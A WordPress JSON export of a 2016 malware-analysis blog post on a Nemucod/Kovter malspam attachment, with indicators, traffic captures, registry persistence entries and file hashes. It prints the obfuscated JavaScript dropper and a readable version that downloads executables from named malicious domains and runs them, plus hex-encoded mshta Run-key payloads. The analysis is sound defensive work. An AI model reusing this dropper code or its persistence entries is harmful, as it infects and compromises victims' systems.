{"id":405,"date":"2016-03-02T22:29:06","date_gmt":"2016-03-02T22:29:06","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=405"},"modified":"2016-03-02T22:30:28","modified_gmt":"2016-03-02T22:30:28","slug":"2016-03-01-malicious-javascript-attachment-nemucodkovter","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=405","title":{"rendered":"2016-03-01 Malicious Javascript attachment &#8211; Nemucod\/Kovter"},"content":{"rendered":"<p>So it is another day at the office and I was looking at some of the malspam that we had received. So I decided to open one up and have a play. Let&#8217;s see what this one email is all about:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/03\/IMG1.png\" rel=\"attachment wp-att-408\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-408\" style=\"border: 1px solid black\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/03\/IMG1.png\" alt=\"Original email with malicious attachment\" width=\"536\" height=\"303\" \/><\/a><\/p>\n<p>As you can see, this is one of the &#8220;Notice to appear in Court&#8221; emails that has been going around for some time now. Let&#8217;s see what is in the zip file:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">var o25='042&quot;+',t86='ge.ni',r61='at',a49='.Exp',e63='rings',j19='type ',n50='o.o',h38='pt',k10=' i&amp;lt;b',k40='.Cre',o75='(f',i87='ttp:',a54=' { ',o71=' = 0',j45=' x',v99='cript',z74='258',i51='ject(',p25='1,',n60='087&quot;',u58='om.',z64='andE',o18='; var',f9='xa.',f97=' l',k31='fo',w76='r xa ',z29='ozuz',k19='posit',t28='ion =',r93='if (',e66=') {',i75='tus ',o82='Scrip',i46='a.',k60='); ',q47='.s',b68='am&quot;);',b93='r) { ',q98='++)',n30='t.Cre',g47='n=1; ',w18='; b',l67='va',u87='dn =',s49='(var ',q46='&quot;WS',n8='xo',l57='.C',m36='TP&quot;',c20='20',u57='&quot; &quot;);',b40='un(fn',m55='cou',a76='e&quot;,2)',k84='00',v45=this,y64=' 1',l47='; ',w57='&quot;GET',y18='xe&quot;,',a69='} c',d43='.ex',b77='a.clo',n97='WScr',q18='o = W',v85='eval',x86='for ',j87=' }; x',x53='a.',m32='.leng',w39='eObj',r57='tri',c87='d = i',q58='pons',i31='l&quot;',a4='n, f',k9='r dn',r30='MP',z85=') { ',w3='ysci',p58='xo.s',x42='.si',c9='; };',i59='hu ',q66='2.XML',w26='eB',m48='pen(',j81=' var ',u11='reate',d23='ect(&quot;',u65='} cat',p1='id=',q64='at',f95='atc',j79='n+n+&quot;',h12='; try',n84='HT',m40='+n',a20='cz',y83='.res',k49='= ',m76=' 0; ',b83=' va',w92='romCh',w70='&quot;ADOD',s71=' }; ',b3='ze ',g53='if (',x44=v45&#x5B;v85],h98='va'+'r b ='+' &quot;vi'+'tra'+t86+'ch'+'ost.'+'ru '+'dob'+z29+'let.'+i59+a20+w3+'och.c'+u58+'pl&quot;.s'+'plit('+u57+b83+'r w'+'s ='+' WS'+v99+l57+u11+'Obje'+'ct('+q46+'cri'+h38+'.Shel'+i31+'); v'+'ar f'+'n ='+' ws'+a49+z64+'nvi'+'ronme'+'ntSt'+e63+'(&quot;%TE'+r30+'%&quot;'+')+S'+r57+'ng.f'+w92+'arC'+'od'+'e(9'+'2)+'+'&quot;931'+n60+o18+' x'+q18+o82+n30+q64+w39+d23+'MSXML'+q66+n84+m36+'); va'+w76+'= '+n97+'ipt'+k40+r61+'eOb'+i51+w70+'B.St'+'re'+b68+j81+'ld ='+m76+x86+'(var '+g47+'n&amp;lt;'+'=3; n'+q98+' { '+k31+'r '+s49+'i=ld;'+k10+m32+'th;'+' i++)'+a54+l67+k9+o71+'; '+'try {'+j45+n50+m48+w57+'&quot;,&quot;h'+i87+'\/\/&quot;+'+'b&#x5B;'+'i]+'+'&quot;\/'+m55+'nter'+'\/?'+p1+'555D565E05160D4A080D06011609050A241605070F17140507014A070B095E275E0301101709094A16115E17525E5550515252545D505C575E55&amp;amp;rn'+'d='+z74+o25+a4+'alse'+'); xo'+q47+'end('+k60+g53+p58+'ta'+i75+'== '+c20+'0)'+' { x'+x53+'open'+'(); '+'xa.'+j19+k49+'1; x'+i46+'writ'+'e('+n8+y83+q58+w26+'ody)'+l47+r93+'xa'+x42+b3+'&amp;gt; '+'10'+k84+z85+u87+y64+'; '+'xa.'+k19+t28+' 0; '+f9+'saveT'+'oFi'+'le'+o75+j79+d43+a76+h12+' { '+'ws.R'+b40+m40+'+&quot;.e'+y18+p25+'0)'+'; '+u65+'ch'+' (er)'+' { };'+j87+b77+'se('+'); }'+'; if'+' (dn '+'== 1'+e66+f97+c87+w18+'rea'+'k;'+s71+a69+f95+'h (e'+b93+'}; }'+c9;x44(h98);<\/pre>\n<p>Yay, it is another script file. Looking at it you can see some of the domains it tries to use and some other bits of information. I looked up the MD5 (572bc8fe45582af271e1302c3d9d7a72) for this file on VirusTotal\/Malwr\/Hybrid Analysis and it came back with nothing. When I ran this through JSDetox with one of my co-workers we got the following back:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tvar b = &quot;vitrage.nichost.ru dobozuzlet.hu czyscioch.com.pl&quot;.split(&quot; &quot;); \r\n\tvar ws = WScript.CreateObject(&quot;WScript.Shell&quot;);\r\n\tvar fn = ws.ExpandEnvironmentStrings(&quot;%TEMP%&quot;)+String.fromCharCode(92)+&quot;931087&quot;;\r\n\tvar xo = WScript.CreateObject(&quot;MSXML2.XMLHTTP&quot;);\r\n\tvar xa = WScript.CreateObject(&quot;ADODB.Stream&quot;);\r\n\tvar ld = 0; for (var n=1; n&lt;=3; n++) \r\n\t{for (var i=ld; i&lt;b.length; i++) { var dn = 0; try { xo.open(&quot;GET&quot;,&quot;http:\/\/&quot;+b&#x5B;i]+&quot;\/counter\/?id=555D565E05160D4A080D06011609050A241605070F17140507014A070B095E275E0301101709094A16115E17525E5550515252545D505C575E55&amp;rnd=258042&quot;+n, false); xo.send(); if (xo.status == 200){ xa.open(); xa.type = 1; xa.write(xo.responseBody); if (xa.size &gt; 1000) {\r\n\tdn = 1;\r\n\txa.position = 0;\r\n\t xa.saveToFile(fn+n+&quot;.exe&quot;,2); \r\n\ttry { ws.Run(fn+n+&quot;.exe&quot;,1,0); \r\n\t} \r\n\tcatch (er) { };\r\n\t};\r\n\txa.close(); \r\n\t};\r\n\tif (dn == 1) \r\n\t{ld = i; \r\n\tbreak; \r\n\t};\r\n\t} \r\n\tcatch (er) { };\r\n\t};\r\n\t};<\/pre>\n<p>When I ran this file on my test VM, the javascript immediately called out to the &#8216;vitrage.nichost.ru&#8217; domain (which you can see in the above script as well) only. Once again, there were three GET requests for what were labeled as &#8216;GIF&#8217; files, but clearly were not as you can see below:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tGET \/counter\/?id=555D565E05160D4A080D06011609050A241605070F17140507014A070B095E275E0301101709094A16115E17525E5550515252545D505C575E55&amp;rnd=2580421 HTTP\/1.1\r\n\tAccept: *\/*\r\n\tUA-CPU: AMD64\r\n\tAccept-Encoding: gzip, deflate\r\n\tUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/6.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\n\tHost: vitrage.nichost.ru\r\n\tConnection: Keep-Alive\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.6.2\r\n\tDate: Tue, 01 Mar 2016 19:56:06 GMT\r\n\tContent-Type: image\/gif\r\n\tContent-Length: 283165\r\n\tConnection: keep-alive\r\n\tX-Powered-By: PHP\/5.2.10\r\n\tContent-Disposition: attachment; filename=bb14.gif\r\n\r\n\tMZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode.<\/pre>\n<p>The GET request being made were:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">195.208.0.121 80 vitrage.nichost.ru  0 GET \/counter\/?id=555D565E05160D4A080D06011609050A241605070F17140507014A070B095E275E0301101709094A16115E17525E5550515252545D505C575E55&amp;rnd=2580421\r\n195.208.0.121 80 vitrage.nichost.ru  0 GET \/counter\/?id=555D565E05160D4A080D06011609050A241605070F17140507014A070B095E275E0301101709094A16115E17525E5550515252545D505C575E55&amp;rnd=2580422\r\n195.208.0.121 80 vitrage.nichost.ru  0 GET \/counter\/?id=555D565E05160D4A080D06011609050A241605070F17140507014A070B095E275E0301101709094A16115E17525E5550515252545D505C575E55&amp;rnd=2580423<\/pre>\n<p>The three files that get dropped onto the system from the GET requests are as follows:<\/p>\n<div id=\"attachment_409\" style=\"width: 1134px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/03\/IMG2a.png\" rel=\"attachment wp-att-409\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-409\" class=\"size-full wp-image-409\" style=\"border: 1px solid black\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/03\/IMG2a.png\" alt=\"Properties of the three malicious binaries\" width=\"1124\" height=\"510\" \/><\/a><p id=\"caption-attachment-409\" class=\"wp-caption-text\">Properties of the three malicious binaries<\/p><\/div>\n<p>which have the following MD5 hashes:<\/p>\n<p>File Name: 9310871.exe<br \/>\nMD5: 84876532c2757fce8bf680f8b8a17438<br \/>\nSHA256: 333861969d8e01a844308c5d8c6c1b8957a12abf4c8ef6d830cbb4b1570a83dd<br \/>\nDetection Ratio: 5 \/ 56<br \/>\nFirst Submission: 2016-03-01 21:57:52 UTC<br \/>\n<a href=\"http:\/\/www.virustotal.com\/en\/file\/333861969d8e01a844308c5d8c6c1b8957a12abf4c8ef6d830cbb4b1570a83dd\/analysis\/\" target=\"_blank\">VirusTotal Link<\/a><\/p>\n<p>File Name: 9310872.exe<br \/>\nMD5: 926c1259473d665a293548ddec02280d<br \/>\nSHA256: 9332d77c0010d7b9452c967e2fc88c4e666fd505841f3a906297e00e8332f19e<br \/>\nDetection Ratio: 28 \/ 56<br \/>\nFirst Submission: 2016-02-28 22:56:19 UTC<br \/>\n<a href=\"http:\/\/www.virustotal.com\/en\/file\/9332d77c0010d7b9452c967e2fc88c4e666fd505841f3a906297e00e8332f19e\/analysis\/\" target=\"_blank\">VirusTotal Link<\/a><\/p>\n<p>File Name: 9310873.exe<br \/>\nMD5: d48ef4bb0549a67083017169169ef3ee<br \/>\nSHA256: daf4d96a121c9e4935082d4e0264088ff352f14d868f8720d8fa7e4f99c82f05<br \/>\nDetection Ratio: 10 \/ 55<br \/>\nFirst Submission: 2012-06-03 11:08:19 UTC<br \/>\n<a href=\"http:\/\/www.virustotal.com\/en\/file\/daf4d96a121c9e4935082d4e0264088ff352f14d868f8720d8fa7e4f99c82f05\/analysis\/\" target=\"_blank\">VirusTotal Link<\/a><\/p>\n<p>As you can see from the YouTube video of me running the malicious javascript file on my VM, once I execute the file, the first binary that gets run is the &#8216;9310871.exe&#8217; followed by &#8216;9310872.exe.&#8217; Shortly after that it looks like Powershell executes and is most likely when the rest of the malicious files get downloaded onto the system, and persistence for this piece of malware gets setup as well. Odd the 9310873.exe never runs though.<\/p>\n<p><iframe loading=\"lazy\" title=\"2016-03-01 KOVTER\/Nemucod EK from malicious email attachment\" width=\"640\" height=\"480\" src=\"https:\/\/www.youtube.com\/embed\/ZS_3FD_y0f0?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe><\/p>\n<p>We can also see based on the traffic the callbacks that are being made. Unfortunately it looks like these got shutdown by the time I managed to play with this javascript:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/03\/img2.png\" rel=\"attachment wp-att-406\"><img loading=\"lazy\" decoding=\"async\" style=\"border: 1px solid black\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/03\/img2.png\" alt=\"\" width=\"1280\" height=\"800\" class=\"aligncenter size-full wp-image-406\" \/><\/a><\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\t178.33.69.66 80 POST \/upload.php HTTP\/1.1  (application\/x-www-form-urlencoded)\r\n\t178.33.69.66 80 POST \/upload.php HTTP\/1.1  (application\/x-www-form-urlencoded)\r\n\t73.13.11.31 80 POST \/ HTTP\/1.1  (application\/x-www-form-urlencoded)\r\n\t73.13.11.31 80 POST \/ HTTP\/1.1  (application\/x-www-form-urlencoded)\r\n\t73.13.11.31 80 POST \/ HTTP\/1.1  (application\/x-www-form-urlencoded)\r\n\t73.13.11.31 80 POST \/ HTTP\/1.1  (application\/x-www-form-urlencoded)\r\n\t73.13.11.31 80 POST \/ HTTP\/1.1  (application\/x-www-form-urlencoded)\r\n\t73.13.11.31 80 POST \/ HTTP\/1.1  (application\/x-www-form-urlencoded)\r\n\t73.13.11.31 80 POST \/ HTTP\/1.1  (application\/x-www-form-urlencoded)\r\n\t73.13.11.31 80 POST \/ HTTP\/1.1  (application\/x-www-form-urlencoded)\r\n\t73.13.11.31 80 POST \/ HTTP\/1.1  (application\/x-www-form-urlencoded)\r\n\t73.13.11.31 80 POST \/ HTTP\/1.1  (application\/x-www-form-urlencoded)\r\n\t73.13.11.31 80 POST \/ HTTP\/1.1  (application\/x-www-form-urlencoded)\r\n\t73.13.11.31 80 POST \/ HTTP\/1.1  (application\/x-www-form-urlencoded)\r\n\t73.13.11.31 80 POST \/ HTTP\/1.1  (application\/x-www-form-urlencoded)\r\n\t73.13.11.31 80 POST \/ HTTP\/1.1  (application\/x-www-form-urlencoded)\r\n\t73.13.11.31 80 POST \/ HTTP\/1.1  (application\/x-www-form-urlencoded)\r\n\t73.13.11.31 80 POST \/ HTTP\/1.1  (application\/x-www-form-urlencoded)\r\n\t73.13.11.31 80 POST \/ HTTP\/1.1  (application\/x-www-form-urlencoded)\r\n\t73.13.11.31 80 POST \/ HTTP\/1.1  (application\/x-www-form-urlencoded)\r\n\t73.13.11.31 80 POST \/ HTTP\/1.1  (application\/x-www-form-urlencoded)\r\n\t73.13.11.31 80 POST \/ HTTP\/1.1  (application\/x-www-form-urlencoded)\r\n\t73.13.11.31 80 POST \/ HTTP\/1.1  (application\/x-www-form-urlencoded)<\/pre>\n<p>I also ran RegShot on the test VM a little while later (on a restored VM), and noticed some of the other files that got added to the system and how persistence is established as well. The RegShot results can be found <a href=\"http:\/\/raw.githubusercontent.com\/bloomer1016\/Nemucod-Kovter-Email-2016-03-01\/master\/RegShot-Results.txt\" target=\"_blank\">here<\/a> (and also in my <a href=\"http:\/\/github.com\/bloomer1016\/Nemucod-Kovter-Email-2016-03-01\" target=\"_blank\">Github repo for this post<\/a>). Here are some of the highlights from the Regshot log:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\t----------------------------------\r\n\tKeys added: 47\r\n\t----------------------------------\r\n\tHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\r\n\tHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\r\n\tHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\OSUpgrade\r\n\tHKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\r\n\tHKLM\\SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\WindowsUpdate\r\n\tHKLM\\SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\WindowsUpdate\\OSUpgrade\r\n\tHKLM\\SOFTWARE\\Wow6432Node\\a46994532b\r\n\tHKU\\S-1-5-21-3862639240-4259269860-3308957193-500\\Software\\Classes\\Zk1JoL7\r\n\tHKU\\S-1-5-21-3862639240-4259269860-3308957193-500\\Software\\a46994532b\r\n\tHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\OSUpgrade\\ReservationsAllowed: 0x00000000\r\n\t\r\n\t----------------------------------\r\n\tValues added: 139\r\n\t----------------------------------\r\n\tHKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\:  6D 73 68 74 61 20 6A 61 76 61 73 63 72 69 70 74 3A 76 58 42 54 72 4B 31 66 3D 22 68 69 74 66 22 3B 4D 4D 38 39 3D 6E 65 77 25 32 30 41 63 74 69 76 65 58 4F 62 6A 65 63 74 28 22 57 53 63 72 69 70 74 2E 53 68 65 6C 6C 22 29 3B 4C 6E 68 74 39 4D 69 3D 22 44 22 3B 42 42 36 36 4B 4E 3D 4D 4D 38 39 2E 52 65 67 52 65 61 64 28 22 48 4B 4C 4D 5C 5C 73 6F 66 74 77 61 72 65 5C 5C 57 6F 77 36 34 33 32 4E 6F 64 65 5C 5C 61 34 36 39 39 34 35 33 32 62 5C 5C 65 34 66 65 61 65 33 36 22 29 3B 6E 31 69 55 41 32 6D 68 3D 22 62 5A 51 73 77 22 3B 65 76 61 6C 28 42 42 36 36 4B 4E 29 3B 6C 30 56 56 43 6F 32 58 68 3D 22 48 4C 35 75 71 63 4B 4A 41 6B 22 3B\r\n\tHKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\:  6D 73 68 74 61 20 6A 61 76 61 73 63 72 69 70 74 3A 4F 34 70 6F 6C 4B 53 4A 56 3D 22 47 43 54 4B 46 53 37 37 73 22 3B 66 38 58 3D 6E 65 77 25 32 30 41 63 74 69 76 65 58 4F 62 6A 65 63 74 28 22 57 53 63 72 69 70 74 2E 53 68 65 6C 6C 22 29 3B 6C 6A 70 4B 66 70 6C 31 3D 22 58 54 72 61 34 59 75 22 3B 66 32 49 67 76 37 3D 66 38 58 2E 52 65 67 52 65 61 64 28 22 48 4B 4C 4D 5C 5C 73 6F 66 74 77 61 72 65 5C 5C 57 6F 77 36 34 33 32 4E 6F 64 65 5C 5C 61 34 36 39 39 34 35 33 32 62 5C 5C 65 34 66 65 61 65 33 36 22 29 3B 46 70 33 64 71 43 51 68 47 3D 22 42 54 59 6A 46 36 22 3B 65 76 61 6C 28 66 32 49 67 76 37 29 3B 63 6B 72 44 52 6A 30 3D 22 56 75 64 73 6C 22 3B\r\n\tHKLM\\SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\WindowsUpdate\\DisableOSUpgrade: 0x00000001 &lt;--- THIS DISABLES THE UPGRADE TO WINDOWS 10\r\n\tHKLM\\SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\WindowsUpdate\\OSUpgrade\\ReservationsAllowed: 0x00000000\r\n\tHKLM\\SOFTWARE\\Wow6432Node\\a46994532b\\1d5363df: &quot;Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)&quot;\r\n\tHKLM\\SOFTWARE\\Wow6432Node\\a46994532b\\fe6435d5: &quot;864&quot;\r\n\tHKLM\\SOFTWARE\\Wow6432Node\\a46994532b\\82f24cba: &quot;7B17110FC215FB61&quot;\r\n\tHKLM\\SOFTWARE\\Wow6432Node\\a46994532b\\93923d84: &quot;1456871049&quot;\r\n\tHKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{B6A055D0-8BF8-4E06-8AA1-F3EAD8905E63}\\DynamicInfo:  03 00 00 00 F4 9B 7F 39 C0 13 CF 01 AF 4C CD 2C 3A F5 D0 01 00 00 00 00 00 00 00 00\r\n\tHKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{B6A055D0-8BF8-4E06-8AA1-F3EAD8905E63}\\DynamicInfo:  03 00 00 00 F4 9B 7F 39 C0 13 CF 01 2E 00 D5 BB 09 74 D1 01 00 00 00 00 00 00 00 00\r\n\r\n\t----------------------------------\r\n\tFiles added: 19\r\n\t----------------------------------\r\n\tC:\\Users\\Administrator\\AppData\\Local\\Temp\\9310872.exe\r\n\tC:\\Users\\Administrator\\AppData\\Local\\Temp\\9310873.exe\r\n\tC:\\Users\\Administrator\\AppData\\Local\\ojyvoc\\y44W.CWG5zX\r\n\tC:\\Users\\Administrator\\AppData\\Roaming\\debauchee.dll\r\n\tC:\\Users\\Administrator\\AppData\\Roaming\\f21.png\r\n\tC:\\Users\\Administrator\\AppData\\Roaming\\SemenCaraculNapa\r\n\tC:\\Users\\Administrator\\AppData\\Roaming\\System.dll\r\n\r\n\t----------------------------------\r\n\tFiles deleted: 10\r\n\t----------------------------------\r\n\tC:\\Windows\\System32\\wdi\\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\\{946bd055-d1fe-45d1-841c-79e2183924a5}\\snapshot.etl\r\n\tC:\\Windows\\System32\\wdi\\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\\{add332ba-30a1-4295-8a1c-0407847ee9ab}\\snapshot.etl\r\n\tC:\\Windows\\System32\\wdi\\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\\{d4160889-5bf4-448d-ba4a-3ad7824e1812}\\snapshot.etl\r\n\tC:\\Windows\\System32\\wdi\\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\\{e925626a-b871-4289-ac71-36f1a63b79d1}\\snapshot.etl\r\n\tC:\\Windows\\System32\\wdi\\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\\{e9c28dd0-c5c3-49e6-93f1-d0b75ec559fa}\\snapshot.etl\r\n\r\n\t----------------------------------\r\n\tFolders added: 2\r\n\t----------------------------------\r\n\tC:\\Users\\Administrator\\AppData\\Local\\ojyvoc<\/pre>\n<p>Here are the MD5 hashes and links to them in VirusTotal for the other files that were dropped by this malware:<\/p>\n<p>File Name: SemenCaraculNapa<br \/>\nMD5: 21e4a262fc8efc7a9a06d2d457cbf0bb<br \/>\nSHA256:\t68fd6566b4f7de2cf5b73fb3f3381430cc9a65a3237224ce91d93f8d006cb8a4<br \/>\nDetection Ratio: 0 \/ 56<br \/>\nFirst Submission: 2016-02-29 00:16:32 UTC<br \/>\n<a href=\"http:\/\/www.virustotal.com\/en\/file\/68fd6566b4f7de2cf5b73fb3f3381430cc9a65a3237224ce91d93f8d006cb8a4\/analysis\/\" target=\"_blank\">VirusTotal Link<\/a><\/p>\n<p>File Name: System.dll<br \/>\nMD5: 883eff06ac96966270731e4e22817e11<br \/>\nSHA256:\t44e5dfd551b38e886214bd6b9c8ee913c4c4d1f085a6575d97c3e892b925da82<br \/>\nDetection Ratio: 0 \/ 56<br \/>\nFirst Submission: 2014-10-07 09:22:47 UTC<br \/>\n<a href=\"http:\/\/www.virustotal.com\/en\/file\/44e5dfd551b38e886214bd6b9c8ee913c4c4d1f085a6575d97c3e892b925da82\/analysis\/\" target=\"_blank\">VirusTotal Link<\/a><\/p>\n<p>File Name: debauchee.dll<br \/>\nMD5: 3ccae2845ad8f6ad11137488fd49102a<br \/>\nSHA256: 79e1d4d6c5550fed46fa4c0b4b49a6c95a2d4f10bba58cfee963e24721307074<br \/>\nDetection Ratio: 13 \/ 56<br \/>\nFirst Submission: 2016-02-28 22:58:08 UTC<br \/>\n<a href=\"http:\/\/www.virustotal.com\/en\/file\/79e1d4d6c5550fed46fa4c0b4b49a6c95a2d4f10bba58cfee963e24721307074\/analysis\/\" target=\"_blank\">VirusTotal Link<\/a><\/p>\n<p>File Name: f21.png<br \/>\nMD5: beec55b9a49ff4f16e5a284a9f6d3b0e<br \/>\nSHA256: a5dd5257ebcbb81bff3007b6153dd0b3833760ae9542a9eb3c54a68dc8d6947e<br \/>\nDetection Ratio: 0 \/ 56<br \/>\nFirst Submission: 2016-02-29 00:16:32 UTC<br \/>\n<a href=\"http:\/\/www.virustotal.com\/en\/file\/a5dd5257ebcbb81bff3007b6153dd0b3833760ae9542a9eb3c54a68dc8d6947e\/analysis\/\" target=\"_blank\">VirusTotal Link<\/a><\/p>\n<p>Lastly, I ran the PCAP through my test Security Onion setup with just the default ET rules (I do not have the ET Pro subscription unfortunately) and it did not see a single request as malicious or suspicious. Running the same PCAP through VirusTotal gave me more insight into what this malware was. It looks to be Nemucod\/Kovter. To see the results from the PCAP in VirusTotal <a href=\"http:\/\/www.virustotal.com\/en\/file\/cb313a2d8666be42dbfe961d1d32ee7ee602633d25b1d62bc5e3b312254e2594\/analysis\/1456867936\" target=\"_blank\">click here<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>So it is another day at the office and I was looking at some of the malspam that we had received. So I decided to open one up and have a play. Let&#8217;s see what this one email is all about: As you can see, this is one of the &#8220;Notice to appear in Court&#8221; emails that has been going around for some time now. Let&#8217;s see what is in the zip file: var o25=&#8217;042&quot;+&#8217;,t86=&#8217;ge.ni&#8217;,r61=&#8217;at&#8217;,a49=&#8217;.Exp&#8217;,e63=&#8217;rings&#8217;,j19=&#8217;type &#8216;,n50=&#8217;o.o&#8217;,h38=&#8217;pt&#8217;,k10=&#8217; i&amp;lt;b&#8217;,k40=&#8217;.Cre&#8217;,o75='(f&#8217;,i87=&#8217;ttp:&#8217;,a54=&#8217; { &#8216;,o71=&#8217; = 0&#8242;,j45=&#8217; x&#8217;,v99=&#8217;cript&#8217;,z74=&#8217;258&#8242;,i51=&#8217;ject(&#8216;,p25=&#8217;1,&#8217;,n60=&#8217;087&quot;&#8217;,u58=&#8217;om.&#8217;,z64=&#8217;andE&#8217;,o18=&#8217;; var&#8217;,f9=&#8217;xa.&#8217;,f97=&#8217; l&#8217;,k31=&#8217;fo&#8217;,w76=&#8217;r xa &#8216;,z29=&#8217;ozuz&#8217;,k19=&#8217;posit&#8217;,t28=&#8217;ion =&#8217;,r93=&#8217;if (&#8216;,e66=&#8217;) {&#8216;,i75=&#8217;tus &#8216;,o82=&#8217;Scrip&#8217;,i46=&#8217;a.&#8217;,k60=&#8217;); &#8216;,q47=&#8217;.s&#8217;,b68=&#8217;am&quot;);&#8217;,b93=&#8217;r) { &#8216;,q98=&#8217;++)&#8217;,n30=&#8217;t.Cre&#8217;,g47=&#8217;n=1; &#8216;,w18=&#8217;; b&#8217;,l67=&#8217;va&#8217;,u87=&#8217;dn =&#8217;,s49='(var &#8216;,q46=&#8217;&quot;WS&#8217;,n8=&#8217;xo&#8217;,l57=&#8217;.C&#8217;,m36=&#8217;TP&quot;&#8217;,c20=&#8217;20&#8217;,u57=&#8217;&quot; &quot;);&#8217;,b40=&#8217;un(fn&#8217;,m55=&#8217;cou&#8217;,a76=&#8217;e&quot;,2)&#8217;,k84=&#8217;00&#8217;,v45=this,y64=&#8217; 1&#8242;,l47=&#8217;; &#8216;,w57=&#8217;&quot;GET&#8217;,y18=&#8217;xe&quot;,&#8217;,a69=&#8217;}&#8230;<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/www.herbiez.com\/?p=405\"><span>Continue reading<\/span><i class=\"crycon-right-dir\"><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-405","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/405","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=405"}],"version-history":[{"count":26,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/405\/revisions"}],"predecessor-version":[{"id":435,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/405\/revisions\/435"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=405"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=405"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=405"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}